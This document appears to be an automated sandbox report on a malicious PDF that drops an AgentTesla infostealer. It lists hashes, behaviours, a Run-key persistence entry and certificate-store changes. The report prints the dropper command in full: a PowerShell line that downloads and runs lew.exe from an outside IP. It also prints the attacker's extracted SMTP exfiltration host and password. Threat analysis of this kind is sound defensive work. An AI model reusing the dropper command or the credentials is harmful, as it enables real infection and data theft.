Analysis
-
max time kernel
118s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
12-12-2023 10:52
Behavioral task
behavioral1
Sample
IMG_008542100.pdf
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
IMG_008542100.pdf
Resource
win10v2004-20231127-en
General
-
Target
IMG_008542100.pdf
-
Size
1.3MB
-
MD5
2f1d6b1a0ba37b4a5b7a62de21886b18
-
SHA1
f0d8b39999e566f5177dfcfb73843a35f62e0100
-
SHA256
ca28f4b4337e38b1d178853fc72012895eaee002bec90d907b177623eed6967c
-
SHA512
636b628e22f7ae1c3ca2f2e7323dc0a4787ae8108ed650594d1bdf0d7b3244ac6c3ce4254e5fc24414b30f3821ee5d8dc831d3f2032561221b27b71fc30501ea
-
SSDEEP
24:WbKZ7EjswTw+Lwky3lD6E5wkMMJIWgIXG2CSYapAakwOerXQr/3SlJiNno2fuxk2:tmswTwGwkyV1wkMYXG2lNkmXQbOiN0J
Malware Config
Extracted
http://62.233.57.103/hih/lew.exe
Extracted
Protocol: smtp- Host:
server1.sqsendy.shop - Port:
587 - Username:
[email protected] - Password:
&qZV17u[D~36
Extracted
agenttesla
Protocol: smtp- Host:
server1.sqsendy.shop - Port:
587 - Username:
[email protected] - Password:
&qZV17u[D~36 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect ZGRat V1 34 IoCs
Processes:
resource yara_rule behavioral1/memory/2628-72-0x0000000005350000-0x00000000053FA000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-73-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-74-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-76-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-78-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-80-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-82-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-84-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-86-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-88-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-90-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-92-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-94-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-96-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-98-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-100-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-102-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-104-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-108-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-110-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-116-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-120-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-122-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-118-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-114-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-112-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-106-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-126-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-124-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-128-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-130-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-132-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-134-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 behavioral1/memory/2628-136-0x0000000005350000-0x00000000053F3000-memory.dmp family_zgrat_v1 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 2968 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
lew.exelew.exepid process 2628 lew.exe 2740 lew.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.exelew.exepid process 2680 cmd.exe 2628 lew.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
lew.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Windows\CurrentVersion\Run\Polsglj = "C:\\Users\\Admin\\AppData\\Roaming\\Polsglj.exe" lew.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 api.ipify.org 9 api.ipify.org 10 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lew.exedescription pid process target process PID 2628 set thread context of 2740 2628 lew.exe lew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1480 timeout.exe -
Processes:
lew.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 lew.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e lew.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e lew.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e lew.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exelew.exepid process 2968 powershell.exe 2740 lew.exe 2740 lew.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 1872 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exelew.exelew.exedescription pid process Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 2628 lew.exe Token: SeDebugPrivilege 2740 lew.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
AcroRd32.exepid process 1872 AcroRd32.exe 1872 AcroRd32.exe 1872 AcroRd32.exe 1872 AcroRd32.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
AcroRd32.execmd.exeWScript.execmd.exelew.exedescription pid process target process PID 1872 wrote to memory of 2664 1872 AcroRd32.exe cmd.exe PID 1872 wrote to memory of 2664 1872 AcroRd32.exe cmd.exe PID 1872 wrote to memory of 2664 1872 AcroRd32.exe cmd.exe PID 1872 wrote to memory of 2664 1872 AcroRd32.exe cmd.exe PID 2664 wrote to memory of 2792 2664 cmd.exe WScript.exe PID 2664 wrote to memory of 2792 2664 cmd.exe WScript.exe PID 2664 wrote to memory of 2792 2664 cmd.exe WScript.exe PID 2664 wrote to memory of 2792 2664 cmd.exe WScript.exe PID 2792 wrote to memory of 2680 2792 WScript.exe cmd.exe PID 2792 wrote to memory of 2680 2792 WScript.exe cmd.exe PID 2792 wrote to memory of 2680 2792 WScript.exe cmd.exe PID 2792 wrote to memory of 2680 2792 WScript.exe cmd.exe PID 2680 wrote to memory of 2968 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 2968 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 2968 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 2968 2680 cmd.exe powershell.exe PID 2680 wrote to memory of 1480 2680 cmd.exe timeout.exe PID 2680 wrote to memory of 1480 2680 cmd.exe timeout.exe PID 2680 wrote to memory of 1480 2680 cmd.exe timeout.exe PID 2680 wrote to memory of 1480 2680 cmd.exe timeout.exe PID 2680 wrote to memory of 2628 2680 cmd.exe lew.exe PID 2680 wrote to memory of 2628 2680 cmd.exe lew.exe PID 2680 wrote to memory of 2628 2680 cmd.exe lew.exe PID 2680 wrote to memory of 2628 2680 cmd.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe PID 2628 wrote to memory of 2740 2628 lew.exe lew.exe
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\IMG_008542100.pdf"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start lew.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs PDF Encrypted. Please click2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\encrypted.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c msd89h2j389uh.bat4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968 -
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
PID:1480 -
C:\Users\Admin\AppData\Local\Temp\lew.exelew.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\lew.exeC:\Users\Admin\AppData\Local\Temp\lew.exe6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
134B
MD514e687ecf432ecd2c615f7f62d283f05
SHA1abae5599f47fd22772927406f763350de7409c4f
SHA2567d3ea68637f7cdad5fed91e8b364ed35fe46ff79d2e79f386c8eaf502570b51c
SHA512a5e3a3ec87caed4f5bf99b486abfa74fb00149534fdef8923bc8a14f349808ca00aee1c5dfd33ad4f4177d7fbdfb5bbaf83daaa68b28fb946e930966ef9c7a96
-
Filesize
34KB
MD5ca0f3fee83088ec1f2c80ae0d5019737
SHA1d893377e3a558a785f547e3b4de6b99281e2b90e
SHA2567a189d9108184f0016e25c54c3f46f832669abd08c4c9bda427ef75614522f64
SHA5127c77a5e549cacb14900ea92367259f5a5fba96539ea026186f7965892ebdf2bc1945bbf99bdcb99a4c3fd71949f6b554f303c28782fd09414309eea4309a2185
-
Filesize
145B
MD5bb82c259d8ee97aa3f1d4e630566bee2
SHA1a0bb0a96c5bf08464055f389e4feb33f44539edc
SHA2560272d568f63ce59dbf3515341d4427f249dc9da30bb46ed26d06823b93233925
SHA512fd16bae59a85ddc16dd38317d30ad0dd9fd1b3636dea5331ea0c7b02fa2d6c3ecdbecf240dd8883f0c73e20ddf51033e85d2c0a3bee2b568a29302658a18053b
-
Filesize
3KB
MD5fe3c6a9bda0cd3fd992867d325451a09
SHA11132832c7d7e72b34f4ecc3557b4d78959d389fc
SHA256b6179a327c5cea2afb551522e18cdfd077c8f5ecced5b31f762f5169fd6fc793
SHA512d14f7d9c621258bb28042300d2ec1589c5210808d6978413c581773c82ca92f43c12eeb436f3030cab272eb6dbd40406f11955dd9928e467fe01333cee7c77b3